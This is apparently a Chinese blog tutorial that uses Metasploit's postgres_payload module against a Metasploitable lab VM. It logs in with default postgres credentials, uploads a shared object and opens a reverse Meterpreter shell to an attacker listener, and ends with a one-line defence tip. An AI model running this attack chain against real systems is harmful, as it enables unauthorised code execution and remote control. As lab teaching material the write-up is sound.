网络安全

Metasploit实战:postgresql代码执行

2019-07-14  本文已影响57人  DreamsonMa

postgresql介绍

PostgreSQL是以加州大学伯克利分校计算机系开发的 POSTGRES,现在已经更名为PostgreSQL,版本 4.2为基础的对象关系型数据库管理系统(ORDBMS)。PostgreSQL支持大部分 SQL标准并且提供了许多其他现代特性:复杂查询、外键、触发器、视图、事务完整性、MVCC。同样,PostgreSQL 可以用许多方法扩展,比如, 通过增加新的数据类型、函数、操作符、聚集函数、索引。免费使用、修改、和分发 PostgreSQL,不管是私用、商用、还是学术研究使用。https://www.postgresql.org/

探测目标postgresql

使用 nmap -sV -p 5432 IP地址 探测目标postgresql版本信息。

➜  ~ nmap -sV 10.0.2.5 | grep sql
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7

postgresql代码执行利用

利用 msf 下 postgresql的 代码执行获得反弹shell.

1、打开msfconsole控制台

➜  ~ msfconsole
[-] ***rting the Metasploit Framework console...-
[-] * WARNING: No database support: No database YAML file
[-] ***
                                                  

 ______________________________________________________________________________
|                                                                              |
|                   METASPLOIT CYBER MISSILE COMMAND V5                        |
|______________________________________________________________________________|
      \                                  /                      /
       \     .                          /                      /            x
        \                              /                      /
         \                            /          +           /
          \            +             /                      /
           *                        /                      /
                                   /      .               /
    X                             /                      /            X
                                 /                     ###
                                /                     # % #
                               /                       ###
                      .       /
     .                       /      .            *           .
                            /
                           *
                  +                       *

                                       ^
####      __     __     __          #######         __     __     __        ####
####    /    \ /    \ /    \      ###########     /    \ /    \ /    \      ####
################################################################################
################################################################################
# WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
                                                           https://metasploit.com


       =[ metasploit v5.0.2-dev                           ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]
+ -- --=[ ** This is Metasploit 5 development branch **   ]

2、查找postgresql漏洞利用模块

msf5 > search postgresql

Matching Modules
================

   Name                                                       Disclosure Date  Rank       Check  Description
   ----                                                       ---------------  ----       -----  -----------
   auxiliary/admin/http/manageengine_pmp_privesc              2014-11-08       normal     Yes    ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
   auxiliary/admin/http/rails_devise_pass_reset               2013-01-28       normal     No     Ruby on Rails Devise Authentication Password Reset
   auxiliary/admin/postgres/postgres_readfile                                  normal     No     PostgreSQL Server Generic Query
   auxiliary/admin/postgres/postgres_sql                                       normal     No     PostgreSQL Server Generic Query
   auxiliary/scanner/postgres/postgres_dbname_flag_injection                   normal     Yes    PostgreSQL Database Name Command Line Flag Injection
   auxiliary/scanner/postgres/postgres_login                                   normal     Yes    PostgreSQL Login Utility
   auxiliary/scanner/postgres/postgres_version                                 normal     Yes    PostgreSQL Version Probe
   auxiliary/server/capture/postgresql                                         normal     No     Authentication Capture: PostgreSQL
   exploit/linux/postgres/postgres_payload                    2007-06-05       excellent  Yes    PostgreSQL for Linux Payload Execution
   exploit/multi/http/manage_engine_dc_pmp_sqli               2014-06-08       excellent  Yes    ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
   exploit/multi/postgres/postgres_createlang                 2016-01-01       good       Yes    PostgreSQL CREATE LANGUAGE Execution
   exploit/windows/postgres/postgres_payload                  2009-04-10       excellent  Yes    PostgreSQL for Microsoft Windows Payload Execution
   post/linux/gather/enum_users_history                                        normal     No     Linux Gather User History

3、使用exploit/linux/postgres/postgres_payload

msf5 > use exploit/linux/postgres/postgres_payload
msf5 exploit(linux/postgres/postgres_payload) > set rhosts 10.0.2.5
rhosts => 10.0.2.5

4、选择payload

msf5 exploit(linux/postgres/postgres_payload) > show payloads

Compatible Payloads
===================

   Name                                      Disclosure Date  Rank    Check  Description
   ----                                      ---------------  ----    -----  -----------
   generic/custom                                             normal  No     Custom Payload
   generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   linux/x86/chmod                                            normal  No     Linux Chmod
   linux/x86/exec                                             normal  No     Linux Execute Command
   linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   linux/x86/read_file                                        normal  No     Linux Read File
   linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

msf5 exploit(linux/postgres/postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/postgres/postgres_payload) > set lhost 10.0.2.12
lhost => 10.0.2.12

5、检查参数设置

msf5 exploit(linux/postgres/postgres_payload) > show options

Module options (exploit/linux/postgres/postgres_payload):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD  postgres         no        The password for the specified username. Leave blank for a random password.
   RHOSTS    10.0.2.5         yes       The target address range or CIDR identifier
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.12        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux x86

6、开始渗透攻击

msf5 exploit(linux/postgres/postgres_payload) > run

[*] Started reverse TCP handler on 10.0.2.12:4444 
[*] 10.0.2.5:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/WaGyEMSt.so, should be cleaned up automatically
[*] Sending stage (914728 bytes) to 10.0.2.5
[*] Meterpreter session 1 opened (10.0.2.12:4444 -> 10.0.2.5:35547) at 2019-07-14 01:28:44 -0400

meterpreter > sysinfo
Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > shell
Process 5163 created.
Channel 1 created.
id
uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres)

提权

参考:Metasploit实战:Telnet暴破和提权

防御修复

防御:屏蔽任意IP连接Postgresql
修复:升级版本,安全配置

推荐汇总贴: 漏洞利用套路汇总

上一篇下一篇

猜你喜欢

热点阅读